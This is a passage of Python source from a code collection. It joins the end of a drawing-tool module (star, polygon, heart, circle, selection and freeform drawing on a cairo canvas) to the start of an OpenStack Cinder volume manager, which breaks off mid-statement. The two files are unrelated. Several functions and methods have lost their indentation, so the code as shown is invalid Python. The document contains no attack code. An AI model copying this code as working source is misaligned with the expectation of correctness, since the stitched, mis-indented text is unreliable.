        A = math.atan2(y, x)
        dA = 2 * math.pi / 2
        r = math.hypot(y, x)
        p = [(widget.oldx, widget.oldy)]
        p.append((widget.oldx + int(r * math.cos(A)),
                  widget.oldy + int(r * math.sin(A))))
        p.append((widget.oldx + int(0.74 * r * math.cos(A + dA / 6)),
                  widget.oldy + int(0.74 * r * math.sin(A + dA / 6))))
        p.append((widget.oldx + int(2 * r * math.cos(A + dA / 6 + dA / 20)),
                  widget.oldy + int(2 * r * math.sin(A + dA / 6 + dA / 20))))
        p.append((widget.oldx +
                  int(2 * r * math.cos(A + dA / 6 - dA / 20 + dA / 6)),
                  widget.oldy +
                  int(2 * r * math.sin(A + dA / 6 - dA / 20 + dA / 6))))
        p.append((widget.oldx + int(0.74 * r * math.cos(A + dA / 6 + dA / 6)),
                  widget.oldy + int(0.74 * r * math.sin(A + dA / 6 + dA / 6))))
        p.append((widget.oldx + int(r * math.cos(A + dA / 2)),
                  widget.oldy + int(r * math.sin(A + dA / 2))))
        self._draw_polygon(widget, temp, fill, p)
def parallelogram(self, widget, coords, temp, fill):
"""Draw a parallelogram.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
x = int((coords[0] - widget.oldx) / 4)
points = [(widget.oldx, widget.oldy), (coords[0] - x, widget.oldy),
(coords[0], coords[1]), (widget.oldx + x, coords[1])]
self._draw_polygon(widget, temp, fill, points)
def star(self, widget, coords, n, temp, fill):
    """Draw a star with n points.

    Alternates an outer vertex (at the drag radius) with an inner vertex
    at 0.4 of that radius, rotated half a sector further.

    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    @param n -- number of points
    @param temp -- switch between context and temp context
    @param fill -- Fill object
    """
    run = coords[0] - widget.oldx
    rise = coords[1] - widget.oldy
    angle = math.atan2(rise, run)
    sector = 2 * math.pi / n
    outer = math.hypot(rise, run)

    def outer_vertex(a):
        return (widget.oldx + int(outer * math.cos(a)),
                widget.oldy + int(outer * math.sin(a)))

    def inner_vertex(a):
        return (widget.oldx + int(0.4 * outer * math.cos(a + sector / 2)),
                widget.oldy + int(0.4 * outer * math.sin(a + sector / 2)))

    vertices = [outer_vertex(angle), inner_vertex(angle)]
    for _ in range(int(n) - 1):
        angle = angle + sector
        vertices.append(outer_vertex(angle))
        vertices.append(inner_vertex(angle))
    self._draw_polygon(widget, temp, fill, vertices)
def polygon_regular(self, widget, coords, n, temp, fill):
    """Draw a regular polygon with n sides.

    The first vertex is at the pointer; the rest are rotated around the
    press point in equal angular steps.

    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    @param n -- number of sides
    @param temp -- switch between context and temp context
    @param fill -- Fill object
    """
    run = coords[0] - widget.oldx
    rise = coords[1] - widget.oldy
    angle = math.atan2(rise, run)
    sector = 2 * math.pi / n
    radius = math.hypot(rise, run)
    vertices = []
    for _ in range(int(n)):
        vertices.append((widget.oldx + int(radius * math.cos(angle)),
                         widget.oldy + int(radius * math.sin(angle))))
        angle = angle + sector
    self._draw_polygon(widget, temp, fill, vertices)
def heart(self, widget, coords, temp, fill):
    """Draw a heart shape.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    @param temp -- switch between context and temp context
    @param fill -- Fill object
    """
    # Draw on the temp context while dragging, or on the final drawing
    # context when the shape is committed.
    if temp:
        ctx = widget.temp_ctx
    else:
        ctx = widget.drawing_ctx
    # Size depends on the vertical drag distance only;
    # hypot(dy, dy) == dy * sqrt(2).
    dy = math.fabs(coords[1] - widget.oldy)
    r = math.hypot(dy, dy)
    w = r / 10.0
    if w == 0:
        # non invertible cairo matrix
        return
    ctx.set_line_width(widget.tool['line size'])
    line_width = ctx.get_line_width()
    ctx.save()
    ctx.new_path()
    # A fixed heart outline (four Bezier curves in a ~100-unit design
    # space) is scaled by w around the press point; the line width is
    # divided by w to undo the scale on the stroke.
    ctx.translate(widget.oldx, widget.oldy)
    ctx.scale(w, w)
    ctx.move_to(0, 0)
    ctx.curve_to(0, -30, -50, -30, -50, 0)
    ctx.curve_to(-50, 30, 0, 35, 0, 60)
    ctx.curve_to(0, 35, 50, 30, 50, 0)
    ctx.curve_to(50, -30, 0, -30, 0, 0)
    ctx.set_line_width(line_width / w)
    if fill:
        ctx.save()
        ctx.set_source_rgba(*widget.tool['cairo_fill_color'])
        ctx.fill_preserve()
        # NOTE(review): the opaque white SOURCE-operator stroke appears
        # to clear the pixels under the outline before the real stroke
        # below -- confirm this is the intended effect.
        ctx.set_operator(cairo.OPERATOR_SOURCE)
        ctx.set_source_rgba(1.0, 1.0, 1.0, 1)
        ctx.stroke_preserve()
        ctx.restore()
    ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
    ctx.stroke()
    ctx.restore()
    # TODO: clip
    widget.queue_draw()
def circle(self, widget, coords, temp, fill):
    """Draw a circle.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    @param temp -- switch between context and temp context
    @param fill -- Fill object
    """
    # Draw on the temp context while dragging, or on the final drawing
    # context when the shape is committed.
    if temp:
        ctx = widget.temp_ctx
    else:
        ctx = widget.drawing_ctx
    # Normalized drag rectangle: top-left corner plus positive extents.
    x, y, dx, dy = self.adjust(widget, coords)
    if dx == 0 or dy == 0:
        # scale by 0 gives error
        return
    ctx.set_line_width(widget.tool['line size'])
    line_width = ctx.get_line_width()
    ctx.save()
    ctx.new_path()
    # A unit circle is scaled by (dx, dy) into an ellipse; the line
    # width is divided by the smaller scale factor to keep the stroke
    # near the requested size.
    ctx.translate(x, y)
    ctx.scale(dx, dy)
    ctx.arc(0., 0., 1., 0., 2 * math.pi)
    ctx.set_line_width(line_width / float(min(dx, dy)))
    if fill:
        ctx.save()
        ctx.set_source_rgba(*widget.tool['cairo_fill_color'])
        ctx.fill_preserve()
        # NOTE(review): the opaque white SOURCE-operator stroke appears
        # to clear the pixels under the outline before the real stroke
        # below -- confirm this is the intended effect.
        ctx.set_operator(cairo.OPERATOR_SOURCE)
        ctx.set_source_rgba(1.0, 1.0, 1.0, 1)
        ctx.stroke_preserve()
        ctx.restore()
    ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
    ctx.stroke()
    ctx.restore()
    # TODO: clip
    widget.queue_draw()
def clear(self, widget):
    """Clear the drawing.

    Clears only the selected area when a selection exists; otherwise
    the whole canvas is filled with white.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    """
    logging.debug('Desenho.clear')
    widget.desenha = False
    # Drop any pending text items as well.
    widget.textos = []
    x, y = 0, 0
    width, height = widget.get_size()
    # try to clear a selected area first
    if widget.is_selected():
        selection_surface = widget.get_selection()
        _x, _y, width, height = widget.get_selection_bounds()
        ctx = cairo.Context(selection_surface)
        ctx.rectangle(0, 0, width, height)
        # Fill with white.
        ctx.set_source_rgb(1.0, 1.0, 1.0)
        ctx.fill()
    else:
        # No selection: wipe the full drawing surface.
        widget.drawing_ctx.rectangle(x, y, width, height)
        widget.drawing_ctx.set_source_rgb(1.0, 1.0, 1.0)
        widget.drawing_ctx.fill()
    widget.queue_draw()
def text(self, widget, coord_x, coord_y):
    """Display and draw text in the drawing area.

    First click opens the textview at the given position; the next call
    commits the typed text onto the canvas.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coord_x
    @param coord_y
    """
    if not widget.text_in_progress:
        # Start a text edit: show the overlay textview at the click
        # position and give it keyboard focus.
        widget.text_in_progress = True
        widget.activity.move_textview(coord_x, coord_y)
        widget.activity.textview.show()
        widget.activity.textview.set_cursor_visible(True)
        widget.activity.textview.grab_focus()
    else:
        # Finish the edit and stamp the text onto the drawing.
        widget.text_in_progress = False
        textview = widget.activity.textview
        textview.set_cursor_visible(False)
        # need wait until the cursor is hidden
        GObject.idle_add(self._finalize_text, widget, textview)
def _finalize_text(self, widget, textview):
    """Stamp the textview contents onto the drawing, then reset it.

    Runs from an idle callback so the cursor is already hidden when the
    widget's window is painted onto the canvas.
    """
    buf = textview.get_buffer()
    window = textview.get_window(Gtk.TextWindowType.TEXT)
    ctx = widget.drawing_ctx
    tv_alloc = textview.get_allocation()
    # Use the textview's own window as a paint source at its on-screen
    # position, so the rendered text is copied pixel-for-pixel.
    Gdk.cairo_set_source_window(ctx, window, tv_alloc.x, tv_alloc.y)
    ctx.paint()
    widget.activity.textview.hide()
    widget.drawing_canvas.flush()
    try:
        widget.activity.textview.set_text('')
    except AttributeError:
        # Plain Gtk.TextView has no set_text(); clear via the buffer.
        buf.set_text('')
    widget.enable_undo()
    widget.queue_draw()
def selection(self, widget, coords):
"""Make a selection.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
"""
x, y, dx, dy = self.adjust(widget, coords, True)
widget.set_selection_bounds(x, y, dx, dy)
# TODO: clip
widget.queue_draw()
def move_selection(self, widget, coords):
    """Move the selection.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    """
    widget.desenha = True
    # Delta from the previous pointer position.
    dx = int(coords[0] - widget.oldx)
    dy = int(coords[1] - widget.oldy)
    x, y, width, height = widget.get_selection_bounds()
    if widget.pending_clean_selection_background:
        # clear the selection background
        widget.clear_selection_background()
        widget.pending_clean_selection_background = False
    # Remember the current pointer so the next call moves incrementally.
    widget.oldx = coords[0]
    widget.oldy = coords[1]
    new_x, new_y = x + dx, y + dy
    widget.set_selection_start(new_x, new_y)
    widget.queue_draw()
def resize_selection(self, widget, coords):
    """Resize the selection.

    Scales the selection surface by the pointer movement relative to the
    current selection size.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    """
    # Pointer movement since the drag anchor.
    dx = int(coords[0] - widget.oldx)
    dy = int(coords[1] - widget.oldy)
    sel_width = widget.selection_surface.get_width()
    sel_height = widget.selection_surface.get_height()
    if widget.pending_clean_selection_background:
        # clear the selection background
        widget.clear_selection_background()
        widget.pending_clean_selection_background = False
    width_scale = float(sel_width + dx) / float(sel_width)
    height_scale = float(sel_height + dy) / float(sel_height)
    # NOTE(review): a scale of exactly 0 is not rejected here --
    # confirm resize_selection_surface tolerates it.
    if width_scale < 0 or height_scale < 0:
        return
    widget.resize_selection_surface(width_scale, height_scale)
def freeform(self, widget, coords, temp, fill, param=None):
    """Draw polygon.

    Accumulates points in self.points across events and closes the
    polygon when the release point lands near the starting point.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    @param temp -- switch between drawing context and temp context
    @param fill -- Fill object
    @param param -- event phase: "moving" (hover), "motion"
        (press/drag) or "release"
    """
    if param == "moving":
        # mouse not pressed moving
        if self.points:
            if widget.last:
                # First hover after a drag: keep the last drag point
                # and start tracking the hover point.
                self.points.append((coords[0], coords[1]))
                widget.last = []
            else:
                # Subsequent hovers just update the floating endpoint.
                self.points[-1] = (coords[0], coords[1])
    elif param == "motion":
        # when mousepress or mousemove
        if widget.last:
            self.points.append((widget.last[0], widget.last[1]))
            self.points.append((coords[0], coords[1]))
        else:
            # First segment starts at the original press point.
            self.points.append((widget.oldx, widget.oldy))
            self.points.append((coords[0], coords[1]))
        widget.last = coords
    elif param == "release":
        if len(self.points) > 2:
            first = self.points[0]
            dx = coords[0] - first[0]
            dy = coords[1] - first[1]
            d = math.hypot(dx, dy)
            if d > 20:
                # Released far from the start: keep the shape open.
                widget.last = coords
                self.points.append(coords)
            else:
                # close the polygon
                self.points.append((first[0], first[1]))
                # set the last point index to zero to force draw all
                # the polygon
                self._last_point_drawn_index = 0
                self._draw_polygon(widget, False, fill, self.points)
                widget.desenha = False
                widget.last = []
                self.points = []
                widget.enable_undo()
                return
    widget.desenha = True
    if self.points:
        # Draw a circle to show where the freeform start/finish
        ctx = widget.temp_ctx
        ctx.save()
        x_init, y_init = self.points[0]
        ctx.new_path()
        ctx.translate(x_init, y_init)
        ctx.set_line_width(1)
        ctx.set_source_rgba(1., 1., 1., 1.)
        ctx.set_line_cap(cairo.LINE_CAP_ROUND)
        ctx.set_line_join(cairo.LINE_JOIN_ROUND)
        ctx.arc(0, 0, 20, 0., 2 * math.pi)
        ctx.stroke_preserve()
        # Dashed black over solid white keeps the marker visible on
        # any background.
        ctx.set_dash([5, 5], 0)
        ctx.set_source_rgba(0., 0., 0., 1.)
        ctx.stroke()
        ctx.restore()
        # Display the polygon open in the temp canvas
        self._draw_polygon(widget, True, False, self.points, closed=False)
    self.clear_control_points()
def adjust(self, widget, coords, locked=False):
    """Normalize a drag rectangle into (x, y, width, height).

    Returns the top-left corner plus non-negative extents regardless of
    the drag direction. When locked is True the rectangle is clamped to
    the drawing-area bounds.
    @param self -- Desenho.Desenho instance
    @param widget -- Area object (GtkDrawingArea)
    @param coords -- Two value tuple
    @param locked -- clamp the result to the widget size when True
    """
    area_width, area_height = widget.get_size()
    end_x = int(coords[0])
    end_y = int(coords[1])
    left = min(widget.oldx, end_x)
    right = max(widget.oldx, end_x)
    top = min(widget.oldy, end_y)
    bottom = max(widget.oldy, end_y)
    if locked:
        left = max(left, 0)
        top = max(top, 0)
        right = min(right, area_width)
        bottom = min(bottom, area_height)
    return left, top, right - left, bottom - top
| samdroid-apps/paint-activity | Desenho.py | Python | gpl-2.0 | 32,007 |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2017 Georgi Georgiev
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Volume manager manages creating, attaching, detaching, and persistent storage.
Persistent storage volumes keep their state independent of instances. You can
attach to an instance, terminate the instance, spawn a new instance (even
one from a different image) and re-attach the volume with the same data
intact.
**Related Flags**
:volume_manager: The module name of a class derived from
:class:`manager.Manager` (default:
:class:`cinder.volume.manager.Manager`).
:volume_driver: Used by :class:`Manager`. Defaults to
:class:`cinder.volume.drivers.lvm.LVMVolumeDriver`.
:volume_group: Name of the group that will contain exported volumes (default:
`cinder-volumes`)
:num_shell_tries: Number of times to attempt to run commands (default: 3)
"""
# NOTE(ge0rgi): added is_volume_trusted
import requests
import time
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_service import periodic_task
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import timeutils
from oslo_utils import units
from oslo_utils import uuidutils
profiler = importutils.try_import('osprofiler.profiler')
import six
from taskflow import exceptions as tfe
from cinder.common import constants
from cinder import compute
from cinder import context
from cinder import coordination
from cinder import db
from cinder import exception
from cinder import flow_utils
from cinder import keymgr as key_manager
from cinder.i18n import _, _LE, _LI, _LW
from cinder.image import cache as image_cache
from cinder.image import glance
from cinder.image import image_utils
from cinder import manager
from cinder.message import api as message_api
from cinder.message import defined_messages
from cinder.message import resource_types
from cinder import objects
from cinder.objects import cgsnapshot
from cinder.objects import consistencygroup
from cinder.objects import fields
from cinder import quota
from cinder import utils
from cinder import volume as cinder_volume
from cinder.volume import configuration as config
from cinder.volume.flows.manager import create_volume
from cinder.volume.flows.manager import manage_existing
from cinder.volume.flows.manager import manage_existing_snapshot
from cinder.volume import group_types
from cinder.volume import rpcapi as volume_rpcapi
from cinder.volume import utils as vol_utils
from cinder.volume import volume_types
from cinder.scheduler.filters.asset_tag_filter import TrustAssertionFilter
# Module logger and the quota engines for volumes, consistency groups
# and generic groups.
LOG = logging.getLogger(__name__)

QUOTAS = quota.QUOTAS
CGQUOTAS = quota.CGQUOTAS
GROUP_QUOTAS = quota.GROUP_QUOTAS

# Volume statuses that allow removing a volume from a consistency
# group / generic group, or adding one to it.
VALID_REMOVE_VOL_FROM_CG_STATUS = (
    'available',
    'in-use',
    'error',
    'error_deleting')
VALID_REMOVE_VOL_FROM_GROUP_STATUS = (
    'available',
    'in-use',
    'error',
    'error_deleting')
VALID_ADD_VOL_TO_CG_STATUS = (
    'available',
    'in-use')
VALID_ADD_VOL_TO_GROUP_STATUS = (
    'available',
    'in-use')
# Source snapshot/group statuses required when creating a new CG or
# group from a snapshot or from another group.
VALID_CREATE_CG_SRC_SNAP_STATUS = (fields.SnapshotStatus.AVAILABLE,)
VALID_CREATE_GROUP_SRC_SNAP_STATUS = (fields.SnapshotStatus.AVAILABLE,)
VALID_CREATE_CG_SRC_CG_STATUS = ('available',)
VALID_CREATE_GROUP_SRC_GROUP_STATUS = ('available',)
# Shorthand for the volume-attachment list object class.
VA_LIST = objects.VolumeAttachmentList

# Configuration options owned by the volume manager; registered on the
# global CONF below.
volume_manager_opts = [
    cfg.StrOpt('volume_driver',
               default='cinder.volume.drivers.lvm.LVMVolumeDriver',
               help='Driver to use for volume creation'),
    cfg.IntOpt('migration_create_volume_timeout_secs',
               default=300,
               help='Timeout for creating the volume to migrate to '
                    'when performing volume migration (seconds)'),
    cfg.BoolOpt('volume_service_inithost_offload',
                default=False,
                help='Offload pending volume delete during '
                     'volume service startup'),
    cfg.StrOpt('zoning_mode',
               help='FC Zoning mode configured'),
    cfg.StrOpt('extra_capabilities',
               default='{}',
               help='User defined capabilities, a JSON formatted string '
                    'specifying key/value pairs. The key/value pairs can '
                    'be used by the CapabilitiesFilter to select between '
                    'backends when requests specify volume types. For '
                    'example, specifying a service level or the geographical '
                    'location of a backend, then creating a volume type to '
                    'allow the user to select by these different '
                    'properties.'),
    cfg.BoolOpt('suppress_requests_ssl_warnings',
                default=False,
                help='Suppress requests library SSL certificate warnings.'),
]

CONF = cfg.CONF
CONF.register_opts(volume_manager_opts)

# Deprecated driver import paths mapped to their replacements; used in
# VolumeManager.__init__ to transparently upgrade old configurations.
MAPPING = {
    'cinder.volume.drivers.hds.nfs.HDSNFSDriver':
    'cinder.volume.drivers.hitachi.hnas_nfs.HNASNFSDriver',
    'cinder.volume.drivers.hds.iscsi.HDSISCSIDriver':
    'cinder.volume.drivers.hitachi.hnas_iscsi.HNASISCSIDriver',
    'cinder.volume.drivers.hitachi.hnas_nfs.HDSNFSDriver':
    'cinder.volume.drivers.hitachi.hnas_nfs.HNASNFSDriver',
    'cinder.volume.drivers.hitachi.hnas_iscsi.HDSISCSIDriver':
    'cinder.volume.drivers.hitachi.hnas_iscsi.HNASISCSIDriver',
    'cinder.volume.drivers.ibm.xiv_ds8k':
    'cinder.volume.drivers.ibm.ibm_storage',
    'cinder.volume.drivers.emc.scaleio':
    'cinder.volume.drivers.dell_emc.scaleio.driver',
    'cinder.volume.drivers.emc.vnx.driver.EMCVNXDriver':
    'cinder.volume.drivers.dell_emc.vnx.driver.VNXDriver',
    'cinder.volume.drivers.emc.xtremio.XtremIOISCSIDriver':
    'cinder.volume.drivers.dell_emc.xtremio.XtremIOISCSIDriver',
    'cinder.volume.drivers.emc.xtremio.XtremIOFibreChannelDriver':
    'cinder.volume.drivers.dell_emc.xtremio.XtremIOFCDriver',
    'cinder.volume.drivers.datera.DateraDriver':
    'cinder.volume.drivers.datera.datera_iscsi.DateraDriver',
    'cinder.volume.drivers.emc.emc_vmax_iscsi.EMCVMAXISCSIDriver':
    'cinder.volume.drivers.dell_emc.vmax.iscsi.VMAXISCSIDriver',
    'cinder.volume.drivers.emc.emc_vmax_fc.EMCVMAXFCDriver':
    'cinder.volume.drivers.dell_emc.vmax.fc.VMAXFCDriver',
    'cinder.volume.drivers.eqlx.DellEQLSanISCSIDriver':
    'cinder.volume.drivers.dell_emc.ps.PSSeriesISCSIDriver',
}
class VolumeManager(manager.CleanableManager,
                    manager.SchedulerDependentManager):
    """Manages attachable block storage devices."""

    # RPC interface version exposed by this manager.
    RPC_API_VERSION = volume_rpcapi.VolumeAPI.RPC_API_VERSION

    target = messaging.Target(version=RPC_API_VERSION)

    # On cloning a volume, we shouldn't copy volume_type, consistencygroup
    # and volume_attachment, because the db sets that according to [field]_id,
    # which we do copy. We also skip some other values that are set during
    # creation of Volume object.
    _VOLUME_CLONE_SKIP_PROPERTIES = {
        'id', '_name_id', 'name_id', 'name', 'status',
        'attach_status', 'migration_status', 'volume_type',
        'consistencygroup', 'volume_attachment', 'group'}
def __init__(self, volume_driver=None, service_name=None,
             *args, **kwargs):
    """Load the driver from the one specified in args, or from flags.

    :param volume_driver: import path of the driver class; falls back
        to the ``volume_driver`` config option when not given
    :param service_name: backend name, used as the config group
    """
    # update_service_capabilities needs service_name to be volume
    super(VolumeManager, self).__init__(service_name='volume',
                                        *args, **kwargs)
    self.configuration = config.Configuration(volume_manager_opts,
                                              config_group=service_name)
    self.stats = {}

    if not volume_driver:
        # Get from configuration, which will get the default
        # if its not using the multi backend
        volume_driver = self.configuration.volume_driver
    if volume_driver in MAPPING:
        # Transparently upgrade deprecated driver paths (see MAPPING).
        LOG.warning(_LW("Driver path %s is deprecated, update your "
                        "configuration to the new path."), volume_driver)
        volume_driver = MAPPING[volume_driver]

    vol_db_empty = self._set_voldb_empty_at_startup_indicator(
        context.get_admin_context())
    LOG.debug("Cinder Volume DB check: vol_db_empty=%s", vol_db_empty)

    # We pass the current setting for service.active_backend_id to
    # the driver on init, in case there was a restart or something
    curr_active_backend_id = None
    svc_host = vol_utils.extract_host(self.host, 'backend')
    try:
        service = objects.Service.get_by_args(
            context.get_admin_context(),
            svc_host,
            constants.VOLUME_BINARY)
    except exception.ServiceNotFound:
        # NOTE(jdg): This is to solve problems with unit tests
        LOG.info(_LI("Service not found for updating "
                     "active_backend_id, assuming default "
                     "for driver init."))
    else:
        curr_active_backend_id = service.active_backend_id

    if self.configuration.suppress_requests_ssl_warnings:
        LOG.warning(_LW("Suppressing requests library SSL Warnings"))
        requests.packages.urllib3.disable_warnings(
            requests.packages.urllib3.exceptions.InsecureRequestWarning)
        requests.packages.urllib3.disable_warnings(
            requests.packages.urllib3.exceptions.InsecurePlatformWarning)

    self.key_manager = key_manager.API(CONF)
    # Instantiate the configured backend driver.
    self.driver = importutils.import_object(
        volume_driver,
        configuration=self.configuration,
        db=self.db,
        host=self.host,
        cluster_name=self.cluster,
        is_vol_db_empty=vol_db_empty,
        active_backend_id=curr_active_backend_id)

    # Refuse to start clustered (active-active) with a driver that
    # does not support it.
    if self.cluster and not self.driver.SUPPORTS_ACTIVE_ACTIVE:
        msg = _LE('Active-Active configuration is not currently supported '
                  'by driver %s.') % volume_driver
        LOG.error(msg)
        raise exception.VolumeDriverException(message=msg)

    self.message_api = message_api.API()

    # Wrap the driver for osprofiler tracing when profiling is on and
    # the library is importable.
    if CONF.profiler.enabled and profiler is not None:
        self.driver = profiler.trace_cls("driver")(self.driver)

    try:
        self.extra_capabilities = jsonutils.loads(
            self.driver.configuration.extra_capabilities)
    except AttributeError:
        # Driver config without extra_capabilities: use no extras.
        self.extra_capabilities = {}
    except Exception:
        with excutils.save_and_reraise_exception():
            LOG.error(_LE("Invalid JSON: %s"),
                      self.driver.configuration.extra_capabilities)

    # Set up the image-volume cache when the backend enables it.
    if self.driver.configuration.safe_get(
            'image_volume_cache_enabled'):

        max_cache_size = self.driver.configuration.safe_get(
            'image_volume_cache_max_size_gb')
        max_cache_entries = self.driver.configuration.safe_get(
            'image_volume_cache_max_count')
        self.image_volume_cache = image_cache.ImageVolumeCache(
            self.db,
            cinder_volume.API(),
            max_cache_size,
            max_cache_entries
        )
        LOG.info(_LI('Image-volume cache enabled for host %(host)s.'),
                 {'host': self.host})
    else:
        LOG.info(_LI('Image-volume cache disabled for host %(host)s.'),
                 {'host': self.host})
        self.image_volume_cache = None

    # NOTE(review): trusted-computing extension; assumes the
    # trusted_computing option is registered elsewhere -- confirm.
    if CONF.trusted_computing:
        self.asset_tag_filter = TrustAssertionFilter()
def _count_allocated_capacity(self, ctxt, volume):
    """Add *volume*'s size to the per-pool allocated capacity stats.

    :param ctxt: admin context, used for DB updates
    :param volume: volume (dict-like) whose size is being counted
    """
    pool = vol_utils.extract_host(volume['host'], 'pool')
    if pool is None:
        # No pool name encoded in host, so this is a legacy
        # volume created before pool is introduced, ask
        # driver to provide pool info if it has such
        # knowledge and update the DB.
        try:
            pool = self.driver.get_pool(volume)
        except Exception:
            LOG.exception(_LE('Fetch volume pool name failed.'),
                          resource=volume)
            return

        if pool:
            new_host = vol_utils.append_host(volume['host'],
                                             pool)
            self.db.volume_update(ctxt, volume['id'],
                                  {'host': new_host})
        else:
            # Otherwise, put them into a special fixed pool with
            # volume_backend_name being the pool name, if
            # volume_backend_name is None, use default pool name.
            # This is only for counting purpose, doesn't update DB.
            pool = (self.driver.configuration.safe_get(
                'volume_backend_name') or vol_utils.extract_host(
                    volume['host'], 'pool', True))

    try:
        pool_stat = self.stats['pools'][pool]
    except KeyError:
        # First volume in the pool
        self.stats['pools'][pool] = dict(
            allocated_capacity_gb=0)
        pool_stat = self.stats['pools'][pool]
    # Accumulate into both the pool-level and global counters.
    pool_sum = pool_stat['allocated_capacity_gb']
    pool_sum += volume['size']

    self.stats['pools'][pool]['allocated_capacity_gb'] = pool_sum
    self.stats['allocated_capacity_gb'] += volume['size']
def _set_voldb_empty_at_startup_indicator(self, ctxt):
    """Determine if the Cinder volume DB is empty.

    A check of the volume DB is done to determine whether it is empty or
    not at this point.

    :param ctxt: our working context
    :returns: True when no volume rows exist, False otherwise
    """
    # Fetching a single row is enough to decide emptiness.
    vol_entries = self.db.volume_get_all(ctxt, None, 1, filters=None)

    if len(vol_entries) == 0:
        LOG.info(_LI("Determined volume DB was empty at startup."))
        return True
    else:
        LOG.info(_LI("Determined volume DB was not empty at startup."))
        return False
def _sync_provider_info(self, ctxt, volumes, snapshots):
# NOTE(jdg): For now this just updates provider_id, we can add more
# items to the update if they're relevant but we need to be safe in
# what we allow and add a list of allowed keys. Things that make sense
# are provider_*, replication_status etc
updates, snapshot_updates = self.driver.update_provider_info(
volumes, snapshots)
if updates:
for volume in volumes:
# NOTE(JDG): Make sure returned item is in this hosts volumes
update = (
[updt for updt in updates if updt['id'] ==
volume['id']])
if update:
update = update[0]
self.db.volume_update(
ctxt,
update['id'],
{'provider_id': update['provider_id']})
# NOTE(jdg): snapshots are slighty harder, because
# we do not have a host column and of course no get
# all by host, so we use a get_all and bounce our
# response off of it
if snapshot_updates:
cinder_snaps = self.db.snapshot_get_all(ctxt)
for snap in cinder_snaps:
# NOTE(jdg): For now we only update those that have no entry
if not snap.get('provider_id', None):
update = (
[updt for updt in snapshot_updates if updt['id'] ==
snap['id']][0])
if update:
self.db.snapshot_update(
ctxt,
update['id'],
{'provider_id': update['provider_id']})
def _include_resources_in_cluster(self, ctxt):
    """Claim this host's resources for the cluster it just joined.

    Moves volumes, consistency groups and image-volume cache entries
    from this host into self.cluster.

    :param ctxt: working context for the DB calls
    """
    LOG.info(_LI('Including all resources from host %(host)s in cluster '
                 '%(cluster)s.'),
             {'host': self.host, 'cluster': self.cluster})
    num_vols = objects.VolumeList.include_in_cluster(
        ctxt, self.cluster, host=self.host)
    num_cgs = objects.ConsistencyGroupList.include_in_cluster(
        ctxt, self.cluster, host=self.host)
    num_cache = db.image_volume_cache_include_in_cluster(
        ctxt, self.cluster, host=self.host)
    LOG.info(_LI('%(num_vols)s volumes, %(num_cgs)s consistency groups, '
                 'and %(num_cache)s image volume caches from host '
                 '%(host)s have been included in cluster %(cluster)s.'),
             {'num_vols': num_vols, 'num_cgs': num_cgs,
              'host': self.host, 'cluster': self.cluster,
              'num_cache': num_cache})
def init_host(self, added_to_cluster=None, **kwargs):
    """Perform any required initialization.

    Sets up the driver, rebuilds in-memory capacity stats from existing
    volumes, re-exports in-use volumes and publishes capabilities.

    :param added_to_cluster: when truthy, first pull this host's
        resources into the cluster
    """
    ctxt = context.get_admin_context()
    if not self.driver.supported:
        utils.log_unsupported_driver_warning(self.driver)

        if not self.configuration.enable_unsupported_driver:
            LOG.error(_LE("Unsupported drivers are disabled."
                          " You can re-enable by adding "
                          "enable_unsupported_driver=True to the "
                          "driver section in cinder.conf"),
                      resource={'type': 'driver',
                                'id': self.__class__.__name__})
            return

    # If we have just added this host to a cluster we have to include all
    # our resources in that cluster.
    if added_to_cluster:
        self._include_resources_in_cluster(ctxt)

    LOG.info(_LI("Starting volume driver %(driver_name)s (%(version)s)"),
             {'driver_name': self.driver.__class__.__name__,
              'version': self.driver.get_version()})
    try:
        self.driver.do_setup(ctxt)
        self.driver.check_for_setup_error()
    except Exception:
        LOG.exception(_LE("Failed to initialize driver."),
                      resource={'type': 'driver',
                                'id': self.__class__.__name__})
        # we don't want to continue since we failed
        # to initialize the driver correctly.
        return

    # Initialize backend capabilities list
    self.driver.init_capabilities()

    volumes = self._get_my_volumes(ctxt)
    snapshots = self._get_my_snapshots(ctxt)
    self._sync_provider_info(ctxt, volumes, snapshots)
    # FIXME volume count for exporting is wrong

    # Rebuild allocated-capacity stats from scratch and re-export
    # volumes that are currently attached.
    self.stats['pools'] = {}
    self.stats.update({'allocated_capacity_gb': 0})

    try:
        for volume in volumes:
            # available volume should also be counted into allocated
            if volume['status'] in ['in-use', 'available']:
                # calculate allocated capacity for driver
                self._count_allocated_capacity(ctxt, volume)

                try:
                    if volume['status'] in ['in-use']:
                        self.driver.ensure_export(ctxt, volume)
                except Exception:
                    LOG.exception(_LE("Failed to re-export volume, "
                                      "setting to ERROR."),
                                  resource=volume)
                    volume.conditional_update({'status': 'error'},
